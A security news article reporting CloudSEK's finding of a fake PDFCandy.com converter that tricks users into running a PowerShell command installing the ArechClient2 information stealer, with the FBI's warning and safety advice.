CloudSEK recently uncovered a sophisticated malware campaign that targets users by impersonating the popular online file conversion tool, PDFCandy.com. The attackers behind this campaign are distributing the ArechClient2 information stealer malware, which is designed to steal private information such as browser usernames and passwords. This malware belongs to the SectopRAT family and has been active since 2019, spreading through deceptive online advertising and fake software updates.
According to the research shared with Hackread.com by CloudSEK, the attackers have created a fake PDF to DOCX converter that closely resembles the legitimate PDFCandy.com website. They have gone to great lengths to replicate the look and feel of the real website, including using similar web addresses and mimicking the user interface. This elaborate scheme is aimed at tricking unsuspecting users into uploading their files for conversion.
Once a user lands on one of these fake sites and uploads a PDF file, they are prompted to verify a CAPTCHA, similar to what legitimate websites use for security purposes. This step is crucial as it marks the transition from social engineering tactics to system compromise. By introducing the CAPTCHA, the attackers make the fake site appear more legitimate and encourage users to proceed without questioning the authenticity of the website.
After passing the CAPTCHA verification, users are instructed to run a command using Windows’ built-in tool PowerShell, leading to a system compromise. The command analysis reveals a series of redirects that ultimately lead to a malicious file named “adobe.zip” hosted on a suspicious domain flagged by multiple security services. This file contains a folder with an executable file called “audiobitexe”, which is used to launch the ArechClient2 malware.
It is important to note that the FBI issued a warning on March 17, 2025, regarding malicious online file converters being used to distribute harmful software. The agency highlighted the risks associated with using free document converters or downloader tools and advised users to exercise caution when using online file conversion services, verify website legitimacy before uploading files, pay attention to URLs, and be wary of unexpected prompts.
In conclusion, the PDFCandy.com impersonation campaign highlights the importance of staying vigilant online and being cautious of deceptive tactics used by cybercriminals. By taking simple steps to verify the legitimacy of websites and being mindful of unusual prompts, users can protect themselves from falling victim to malware attacks disguised as legitimate tools and services.